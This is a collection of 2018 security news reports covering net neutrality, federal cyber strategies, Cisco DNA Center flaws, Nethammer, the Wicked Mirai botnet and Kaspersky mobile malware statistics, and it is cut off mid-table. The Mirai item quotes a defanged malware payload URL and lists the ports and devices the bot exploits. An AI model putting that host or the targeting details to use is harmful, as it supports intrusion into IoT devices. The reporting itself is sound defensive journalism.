Net neutrality in the U.S. is a bi-partisan issue being fought in a very partisan manner. It was introduced in the Democrat Obama-years, and abandoned by the Republican Trump-installed FCC chairman Ajit Pau. Sen. Edward Markey, D-Mass. filed a procedural petition that would allow a debate on overturning the FCC ruling via the Congressional Review Act. To succeed, this would require the support of the Senate, followed by a vote in the House, and finally the agreement of the president.

The Senate voted Wednesday and the first hurdle has been overcome. The motion needed a simple majority of 51 votes. The Democrats were confident: there are 49 Democrats in the Senate -- Sen. Susan Collins, R-Maine had promised support; and Sen. John McCain, R-AZ, was forced to be absent through illness, providing a basic majority

In the event, the Senate voted by 52 to 47 to open the debate. Three Republicans joined with Democrats: Sen. Susan Collins of Maine, Sen. John Kennedy of Louisiana and Sen. Lisa Murkowski of Alaska. The debate will now go to the House of Representatives, but it is unlikely to go any further. Republicans dominate the House -- and in the unlikely event they agree to re-instate net neutrality, it will almost certainly not be accepted by President Trump.

Right now, net neutrality is, and is likely to remain, dead along purely political partisan lines. But outside of Washington it is not a partisan issue. Sen Markey points out in a twee that 82% of republicans, 90% of democrats, and 86% of all Americans support the concept of net neutrality (statistics from the Program for Public Consultation at the University of Maryland).

The issue can be characterized by universal equal and full access to the internet versus a more efficient and better managed internet. Net neutrality holds that the internet should be equally accessible by and to everyone, always. Opponents hold that some control by the communications companies, particularly the ability to set differential prices, will lead to greater investment in the internet infrastructure and better broadband. The problem with the latter argument is that the communications companies have a history of using such powers to their own benefit and the cost of others.

"Make no mistake," warns Sean McGrath, online privacy expert at BestVPN; "the abolition of net neutrality will erode the democratic fabric that binds the Internet together. It will allow internet service providers and cable companies to dictate the winners and losers in the digital world and it will give a very small number of market players near-limitless power, stifling the rights of citizens that cannot afford to play by their rules."

The fear is that ISPs will block or slow down selected services unless the user pays a premium.

Francis Dinha, CEO and co-founder of the open source VPN protocol OpenVPN, believes that many companies will be forced to re-evaluate their business models since consumers are unlikely to pay for services that have traditionally been free.

"With this in mind," he comments, "there are solutions for users to get around blocking or slowdown. Marketers can use a VPN service that supports strong encryption and good obfuscation techniques to circumvent any slowdown or blocking of any public internet service. It will be very difficult for ISPs to slow down or block a VPN service that supports advanced obfuscation techniques." Note that the VPN industry is likely to be the major non-ISP beneficiary of the end of net neutrality.

There are also specific security concerns over the demise of net neutrality. One is a potential increase in fraudulent activity. If users are forced to pay for better services, the paid accounts will more likely be shared among family and friends. Once they are shared, they are more likely to be stolen by hackers.

"Up to 25 percent of video streaming subscribers share passwords," explains Vanita Pandey, VP of strategy and product marketing at ThreatMetrix. "If the end of net neutrality results in the sluggish Netflix experiences some predict, friends and family will pass around credentials for the fastest broadband account, which will inevitably get posted online, where they'll join more than 9 billion other stolen credentials -- names, addresses, passwords, PIN codes and more -- available to fraudsters on the dark web. As it stands, wayward login credentials will cost streaming companies $650 million in lost potential revenue this year. Across all industries, cybercrime fueled by stolen identity credentials will result in global losses of $3 trillion or more."

After Wednesday's vote, net neutrality activists are jubilant. "This is a historic victory for the free and open Internet, and a major step forward for the future of free expression and democracy," announced Evan Greer, deputy director of Fight for the Future. The reality, however, is that this vote will probably have no ultimate effect on the FCC's ruling against net neutrality -- that would probably require a change in the political landscape before any legislation cements the process.

This is now a purely partisan political issue -- and the only real beneficiary of Wednesday's vote is the Democratic party. The debate now goes to the House of Representatives, where net neutrality will almost certainly be confirmed as dead. But with so much consumer support, Democrats will hope that voters will punish Republican politicians who go against their wishes in the upcoming mid-term elections.


U.S. Energy Department Unveils Multiyear Cybersecurity Plan
18.5.2018 securityweek  Cyber

The U.S. Department of Energy this week announced its strategy to reduce cyber risks in the energy sector and outlined its goals, objectives and activities for the next five years.

With the energy sector increasingly targeted by threat actors, the Energy Department is concerned that attackers may be able to cause a large and prolonged energy disruption. In an effort to improve the cybersecurity and resilience of energy services, the agency has created the DOE Multiyear Plan for Energy Sector Cybersecurity, which is meant to provide a foundation for the recently launched Office of Cybersecurity, Energy Security, and Emergency Response (CESER).US Energy Department announces multiyear plan for cybersecurity in the energy sector

The plan focuses on three main goals: strengthening cybersecurity preparedness, coordinating incident response and recovery, and accelerating research, development and demonstration (RD&D) for resilient energy delivery systems (EDS).

When it comes to strengthening preparedness, the DOE’s objectives include enhancing information sharing and situational awareness capabilities, strengthening risk management capabilities, reducing supply chain vulnerabilities, and developing and improving information sharing tools. This last objective includes the development of a virtual crowdsourced malware forensic analysis platform.

As for incident response and recovery, the Energy Department wants to establish a coordinated national incident response capability, conduct training for emergency responders and improve the incident reporting process, and conduct exercises.

The DOE’s third goal is to accelerate “game-changing RD&D” of resilient EDS, including for detecting, preventing and mitigating cyber incidents. The organization also wants tools and technologies that can anticipate future attack scenarios, and the development of systems and components that are cybersecurity-aware and capable of automatically handling cyberattacks.

“The DOE will be updating the Cybersecurity Capability Maturity Model (C2M2). The market has changed since it was published in February 2014,” commented Michael Magrath, director of global regulations & standards at VASCO Data Security. “We anticipate DOE will incorporate NIST’s Digital Identity Guidelines (SP 800-63-3), refreshed in 2017 and advance risk-based, biometric adaptive authentication technologies to protect the nation’s energy sector.”

“We welcome the DOE raising awareness around critical threats to the energy sector and laying out a strategy,” said Ray DeMeo, COO at Virsec. “While the strategy pillars are sound, making them actionable will be challenging - largely in view of the inertia behind legacy systems. It's critical that we invest with speed and agility, and the roadmap’s goal to accelerate game-changing RD&D of resilient systems stands out. The administration’s funding request for $96 million is hopefully just a down payment, because protecting our infrastructure adequately will cost billions.”


Critical Flaws in Cisco DNA Center Allow Unauthorized Access
18.5.2018 securityweek 
Vulnerebility

Cisco has found and patched three critical unauthorized access vulnerabilities in its Digital Network Architecture (DNA) platform.

Cisco DNA is a solution that helps enterprises automate network operations, making it easy to design, provision and apply policies across their environments.

Cisco discovered that the DNA Center is impacted by three serious flaws. One of them, CVE-2018-0222, is related to the existence of undocumented static credentials for the default admin account.

A remote attacker could leverage these credentials to gain access to the affected system and execute commands with root privileges. The issue has been addressed with the release of Cisco DNA Center software version 1.1.3.

The second vulnerability, CVE-2018-0271, allows a remote attacker to bypass authentication and obtain privileged access to critical services in the DNA Center. This flaw has been patched with the release of Cisco DNA Center software version 1.1.2.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,” Cisco explained in an advisory.

The third critical security hole in DNA Center, CVE-2018-0268, also allows a remote attacker to bypass authentication and obtain elevated privileges. A patch is included in version 1.1.3.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” Cisco said. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

All the vulnerabilities were discovered by Cisco itself and there is no evidence of malicious exploitation.

Cisco published more than a dozen security advisories on Wednesday, including four that describe high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) flaw in IoT Field Network Director (IoT-FND), a denial-of-service (DoS) bug in the Identity Services Engine (ISE), a shell access vulnerability in Enterprise NFV Infrastructure Software (NFVIS), and a DoS problem in Meeting Server.


DHS Publishes New Cybersecurity Strategy
18.5.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.

The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide "the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient."

This framework comprises five pillars containing seven separate goals. The pillars are risk identification; vulnerability reduction Including the twin goals of protecting federal systems and critical industries); threat reduction by proactive means; consequence mitigation (that is, improved incident response); and to enable cybersecurity outcomes. The last pillar comprises the twin goals of strengthening the security and reliability of the cyber ecosystem, and improving the management of its own activities.

"The cyber threat landscape is shifting in real-time, and we have reached a historic turning point," said DHS Secretary Kirstjen Nielsen. "Digital security is now converging with personal and physical security, and it is clear that our cyber adversaries can now threaten the very fabric of our republic itself. That is why DHS is rethinking its approach by adopting a more comprehensive cybersecurity strategy. In an age of brand-name breaches, we must think beyond the defense of specific assets -- and confront systemic risks that affect everyone from tech giants to homeowners. Our strategy outlines how DHS will leverage its unique capabilities on the digital battlefield to defend American networks and get ahead of emerging cyber threats."

Of necessity, however, the five pillars and seven goals are defined in very basic terms. They define objectives, sub-objectives and outcomes -- but with little on methods. For example, goal #1 (the risk identification pillar) is to assess evolving cybersecurity risks. This will be achieved by working with "stakeholders, including sector-specific agencies, nonfederal cybersecurity firms, and other federal and nonfederal entities, to gain an adequate understanding of the national cybersecurity risk posture, analyze evolving interdependencies and systemic risk, and assess changing techniques of malicious actors."

However, nobody was able to predict, detect or prevent Russian meddling in the 2016 presidential election, nor the WannaCry and NotPetya outbreaks. The implication is that something new and beyond just increased interagency cooperation needs to be done to achieve genuine risk identification.

The third pillar, threat reduction together with goal #4 (prevent and disrupt criminal use of cyberspace) is also interesting. The strategy states, "We will reduce cyber threats by countering transnational criminal organizations and sophisticated cyber criminals." Again, the obvious question is, 'How?'. The strategy states, "our law enforcement jurisdiction is broad". But it does not reach into those countries that are generally considered to be the prime movers of serious cyber criminality: Russia, China, Iran and North Korea.

Indeed, the U.S. government has so far failed to repatriate Edward Snowden from Russia, nor even to apprehend Julian Assange in the European Union. It is difficult to see how the DHS will be able to prevent and disrupt advanced foreign criminal use of cyberspace without resorting to new tactics -- such as a more aggressive active defense verging on hacking back. Neither 'active defense' nor 'hack back' are mentioned in the strategy document.

Ray DeMeo, COO at Virsec, has similar concerns. "Cybersecurity is an inherently global issue and it's good that the DHS strategy recognizes the need for a 'global approach with robust international engagement'," he told SecurityWeek. "But it's yet unclear how an agency with a domestic mandate is going to effectively engage globally. The reality is that a large portion of internet crime is driven from the international "wild west" from areas with lax law enforcement, or actual nation-state sponsorship. This problem is as much diplomatic as it is technological."

These caveats aside, it is good to see a formal strategy to cover the DHS' entire theater of responsibility with a clearly stated objective: "By 2023, the Department of Homeland Security will have improved national cybersecurity risk management by increasing security and resilience across government networks and critical infrastructure; decreasing illicit cyber activity; improving responses to cyber incidents; and fostering a more secure and reliable cyber ecosystem through a unified departmental approach, strong leadership, and close partnership with other federal and nonfederal entities."

"The strategy put forth by DHS is very comprehensive and well thought out," says Rishi Bhargava, co-founder at Demisto. "The inclusion of response plan coordination under the Consequence Mitigation section is a critical piece to be able to contain damage from an attack. Any strategy is as good as it's execution. I look forward to seeing this put in action across different departments and policies."

It is reassuring that the organization is not seeking to develop its own new framework, but to encourage the use of existing relevant frameworks. "DHS," says the document, "must expand efforts to encourage adoption of applicable cybersecurity best practices, including NIST's Framework for Improving Critical Infrastructure Cybersecurity."

It is a little surprising, however, that while NIST is specified, the Domain Message Authentication Reporting & Conformance (DMARC) protocol is not mentioned. In October 2017, DHS issued a binding operational directive requiring that all federal agencies start to use DMARC. By January 2018 it was reported that about half of the agencies had implemented DMARC, but only at its lowest level.

It is easy to be critical of a high-level strategy document -- it is the detail of implementation that will decide on the effectiveness of this strategy. For the moment, this document marks a valuable and important approach to unifying and strengthening the domestic cybersecurity remit of the DHS. "The DHS approach to managing cybersecurity risk on the national level," comments Brajesh Goyal, VP of engineering at Cavirin, "is a good analogy for what organizations need to do to manage their cyber-posture. A good framework for this is the NIST Cybersecurity Framework (CSF). This can serve as a foundation for other security in-depth actions."

"It's important that the DHS has finally published its cybersecurity strategy," explains DeMeo; "but by definition, this is high-level. For the most part, these are sensible recommendations. What's critical now is making this strategy actionable. One of the document's guiding principles is to foster innovation and agility -- this is a big ask, where existing time horizons must be reduced from years down to months. We need to dramatically accelerate collaboration with the private sector, where meaningful security innovation is happening daily, if we are going to change the asymmetric nature of today's threat landscape."


CISCO issued security updates to address three critical flaws in Cisco DNA Center
18.5.2018 securityaffairs
Vulnerebility

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.
Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool, experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center, the attacker can use them to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain a privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool, admins need to install the version 1.1.3 as soon as possible.


Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
18.5.2018 securityaffairs
Exploit

Nethammer attack technique is the first truly remote Rowhammer attack that doesn’t require a single attacker-controlled line of code on the targeted system.
A few days ago security experts announced the first network-based remote Rowhammer attack, dubbed Throwhammer. The attack exploits a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.

Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically, an attacker can change any value of the bit in the memory.

The issue has been known at least since 2012, the first attack was demonstrated in 2015 by white hat hackers at Google Project Zero team.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

Bit flipping technique caused by the Rowhammer problems could be exploited to evade the sandbox.

A separate group of security researchers has now demonstrated another network-based remote Rowhammer attack dubbed Nethammert, that leverages uncached memory or flush instruction while processing the network requests.

“Nethammer is the first truly remote Rowhammer attack, without a single attacker-controlled line of code on the targeted system. Systems that use uncached memory or flush instructions while handling network requests, e.g., for interaction with the network device, can be attacked using Nethammer” reads the research paper published by the experts.

The research team was composed of academics from the Graz University of Technology, the University of Michigan and Univ Rennes.

The Nethammer technique can be exploited by attackers to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing.

The attack is feasible only with a fast network connection between the attacker and victim.
“We demonstrate that the frequency of the cache misses is in all three cases high enough to induce bit flips. We evaluated different bit flip scenarios.” continues the paper.
“Depending on the location, the bit flip compromises either the security and integrity of the system and the data of its users, or it can leave persistent damage on the system, i.e., persistent denial of service.”

This process results in a high number of memory accesses to the same set of memory locations, which could induce disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
Nethammer attack
Data corruption resulting from the operations can be exploited by the attackers to gain control over the victim’s system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache.” continues the attacker.
“An attacker can use the unprivileged clflush instruction to invalidate the cache line or use uncached memory if available.”

The experts highlighted that caching makes the attack more difficult, so they devised some techniques to bypass the cache and direct access to the DRAM to cause the interference.

The experts successfully demonstrated three different cache bypasses for Nethammer technique:

A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction
Uncached memory on an ARM-based mobile device.
The experts observed a bit flip every 350 ms demonstrating that it is possible to hammer over the network if at least two memory accesses are served from main memory, they successfully induced the interference by sending a stream of UDP packets with up to 500 Mbit/s to the target system.

The Nethammer attack technique does not require any attack code differently from the original Rowhammer attack.

Unfortunately, any attack technique based on the Rowhammer attack is not possible to mitigate with software patched, to solve the issues, it is necessary to re-design the architecture of the flawed components, meantime threat actors can start exploiting the Rowhammer technique in the wild.

Further details on the Rowhammer attack are reported in my post titled “The Rowhammer: the Evolution of a Dangerous Attack”


The new Wicked Mirai botnet leverages at least three new exploits
18.5.2018 securityaffairs BotNet

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.
The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

Port 8080: Netgear DGN1000 and DGN2200 v1 routers (also used by Reaper botnet)
Port 81: CCTV-DVR Remote Code Execution
Port 8443: Netgear R7000 and R6400 Command Injection (CVE-2016-6277)
Port 80: Invoker shell in compromised web servers
The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Google Offers Free DDoS Protection for U.S. Political Organizations
17.5.2018 securityweek
Attack

Jigsaw, an incubator run by Google parent Alphabet, this week announced the availability of Project Shield – which offers free distributed denial of service (DDoS) protections – for the U.S. political community.

Opened in February 2016 to independent, under-resourced news sites, Project Shield helps protect free speech by fending off crippling DDoS assaults. The service, which leverages Google technology, was launched only weeks after Google Ideas became Jigsaw.

In March last year, Google and Jigsaw announced a partnership to offer Protect Your Election, tools that would help news organizations, human rights groups, and election monitoring sites fend off not only DDoS assaults, but also phishing and account takeover attempts.

This week, Jigsaw revealed that Project Shield is now available for free to “U.S. political organizations registered with the appropriate electoral authorities, including candidates, campaigns, section 527 organizations, and political action committees.”

“These organizations are critical parts of the democratic process, and they deserve the same defenses against cyber-attacks that we’ve offered to news organizations around the world,” George Conard, Product Manager, Jigsaw, says.

The free service is offered in response to an increase in the frequency and intensity of digital attacks against democratic institutions in the United States and globally. Threat actors flood computer systems and servers with traffic to silence political speech and prevent voters from accessing the information they need.

Not only is the number of DDoS attacks increasing overall, but so does the number of attacks the same target faces, recent reports have revealed. The cost of launching a DDoS attack has decreased as well: one can hire a DDoS-launching service for only $10 per hour.

DDoS attacks increasingly target political parties, campaigns, and organizations, Conard notes. The most recent example is a Tennessee county website displaying election results being disrupted earlier this month for an hour on the night of the Tennessee congressional primary elections.

“Any political organization, regardless of size or significance, is potentially at risk. It’s critical to provide support to those smaller, more vulnerable political groups that don’t have the financial or technical resources to do it themselves. Project Shield helps ensure that any eligible organization can be protected from a range of digital attacks — for free,” Conard says.

While Project Shield can protect websites against DDoS attacks, the Protect Your Election initiative can help political organizations defend against other attacks as well. The goal remains the same as when Project Shield was launched: to protect freedom of expression and access to information.

Project Shield leverages Google’s infrastructure to protect from DDoS attacks using “a reverse proxy multi-layer defense system.” Basically, requests from end users first come through the Shield, which filters malicious traffic and only allows legitimate requests to pass through.

Not only is the tool free, but it is also easy to set up and doesn’t require maintenance, to keep a website safe from DDoS attacks, Conard says.

“Protecting critical infrastructure and institutions from cyber-attacks is more important than ever. With the U.S. midterm elections approaching, it’s crucial to make sure that private information is protected and public information is accessible,” he points out.

Jigsaw is committed to working with U.S. political organizations of all sizes to ensure that every one of them, regardless of their resources, can stay safe online. In the coming months, the protections will be expanded to international political organizations as well.


Hackers Steal '$15.3 Million' From Mexico Financial System
17.5.2018 securityweek Incindent

Hackers who targeted Mexico's interbank payment system made off with more than $15 million in the past several weeks, the Bank of Mexico said Wednesday.

The amount of funds involved in the irregular activity totaled "approximately 300 million pesos ($15.3 million)," central bank governor Alejandro Diaz de Leon told reporters.

He said commercial bank customers' accounts were never in danger.

An investigation is under way, the governor said, without indicating if the suspected hackers were domestic or international.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Lorenza Martinez, director general of the corporate payments and services system at the central bank, said on Monday.

Martinez revealed that at least five attacks had occurred but, at that time, said the amount taken was still being analyzed.

After the attacks were detected, banks switched to a slower but more secure method.


IT threat evolution Q1 2018. Statistics
17.5.2018 Kaspersky  Analysis

Q1 figures
According to KSN:

Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
Ransomware attacks were registered on the computers of 179,934 unique users.
Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,322,578 malicious installation packages
18,912 installation packages for mobile banking Trojans
8,787 installation packages for mobile ransomware Trojans
Mobile threats
Q1 events
In Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was distributed.

This malicious resource shows a fake window while displaying the legitimate site in the address bar

It wasn’t a drive-by-download case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it’s interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.

However, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.

Some backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user’s phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let’s hope that the app creators had the noble intention of protecting users from telephone spam and fraudulent calls, but simply chose the wrong means to do so.

Mobile threat statistics
In Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.

Number of detected malicious installation packages, Q2 2017 – Q1 2018

Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018

Among all the threats detected in Q1 2018, the lion’s share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.

Advertising apps, which ranked second in Q4 2017, dropped a place—their share decreased by 8%, accounting for 11% of all detected threats.

On a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.

TOP 20 mobile malware
Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %*
1 DangerousObject.Multi.Generic 70.17
2 Trojan.AndroidOS.Boogr.gsh 12.92
3 Trojan.AndroidOS.Agent.rx 5.55
4 Trojan-Dropper.AndroidOS.Lezok.p 5.23
5 Trojan-Dropper.AndroidOS.Hqwar.ba 2.95
6 Trojan.AndroidOS.Triada.dl 2.94
7 Trojan-Dropper.AndroidOS.Hqwar.i 2.51
8 Trojan.AndroidOS.Piom.rfw 2.13
9 Trojan-Dropper.AndroidOS.Lezok.t 2.06
10 Trojan.AndroidOS.Piom.pnl 1.78
11 Trojan-Dropper.AndroidOS.Agent.ii 1.76
12 Trojan-SMS.AndroidOS.FakeInst.ei 1.64
13 Trojan-Dropper.AndroidOS.Hqwar.gen 1.50
14 Trojan-Ransom.AndroidOS.Zebt.a 1.48
15 Trojan.AndroidOS.Piom.qmx 1.47
16 Trojan.AndroidOS.Dvmap.a 1.40
17 Trojan-SMS.AndroidOS.Agent.xk 1.35
18 Trojan.AndroidOS.Triada.snt 1.24
19 Trojan-Dropper.AndroidOS.Lezok.b 1.22
20 Trojan-Dropper.AndroidOS.Tiny.d 1.22
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected using cloud technologies. Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on machine learning.

Third was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan’s task is to covertly visit web pages as instructed by its C&C.

Fourth and fifth places went to the Trojan matryoshkas Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.

Sixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the Trojan.AndroidOS.Triada family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in “clean” apps.

The Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.

Another interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.

Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 China 34.43
2 Bangladesh 27.53
3 Nepal 27.37
4 Ivory Coast 27.16
5 Nigeria 25.36
6 Algeria 24.13
7 Tanzania 23.61
8 India 23.27
9 Indonesia 22.01
10 Kenya 21.45
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.

Russia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).

The safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).

Mobile banking Trojans
In the reporting period, we detected 18,912 installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q1 2018

Verdict %*
1 Trojan-Banker.AndroidOS.Asacub.bj 12.36
2 Trojan-Banker.AndroidOS.Svpeng.q 9.17
3 Trojan-Banker.AndroidOS.Asacub.bk 7.82
4 Trojan-Banker.AndroidOS.Svpeng.aj 6.63
5 Trojan-Banker.AndroidOS.Asacub.e 5.93
6 Trojan-Banker.AndroidOS.Hqwar.t 5.38
7 Trojan-Banker.AndroidOS.Faketoken.z 5.15
